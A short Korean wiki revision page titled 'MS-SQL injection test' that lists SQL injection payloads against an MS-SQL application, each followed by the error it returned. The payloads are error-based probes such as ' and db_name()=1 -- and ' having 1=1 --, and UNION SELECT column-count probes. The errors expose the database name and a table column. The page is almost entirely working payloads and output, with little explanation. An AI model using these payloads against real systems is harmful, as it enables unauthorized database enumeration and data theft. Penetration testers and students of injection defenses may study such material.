"MS-SQL 인젝션 테스트"의 두 판 사이의 차이

32번째 줄: 32번째 줄:
' union select '1','2','3','4',5--
' union select '1','2','3','4',5--
</source>
</source>
==같이 보기==
*[[MS-SQL]]
*[[SQL 인젝션]]


[[분류: MS-SQL]]
[[분류: MS-SQL]]

2015년 1월 20일 (화) 10:57 판

1 개요

MS-SQL 인젝션 테스트
' and db_name()=1 --
-- com.microsoft.sqlserver.jdbc.SQLServerException: nvarchar 값 'jmdb'을(를) 데이터 형식 int(으)로 변환하지 못했습니다.
' having 1=1 --
com.microsoft.sqlserver.jdbc.SQLServerException: 열 'member.IDX'이(가) 집계 함수나 GROUP BY 절에 없으므로 SELECT 목록에서 사용할 수 없습니다.
' union select '1','2','3','4
com.microsoft.sqlserver.jdbc.SQLServerException: UNION, INTERSECT 또는 EXCEPT 연산자를 사용하여 결합된 모든 쿼리의 대상 목록에는 동일한 개수의 식이 있어야 합니다.
' union select '1','2','3','4','5
com.microsoft.sqlserver.jdbc.SQLServerException: 문자열을 datetime으로 변환하지 못했습니다.
' union select '1','2','3','4',5--

2 같이 보기

문서 댓글 ({{ doc_comments.length }})
{{ comment.name }} {{ comment.created | snstime }}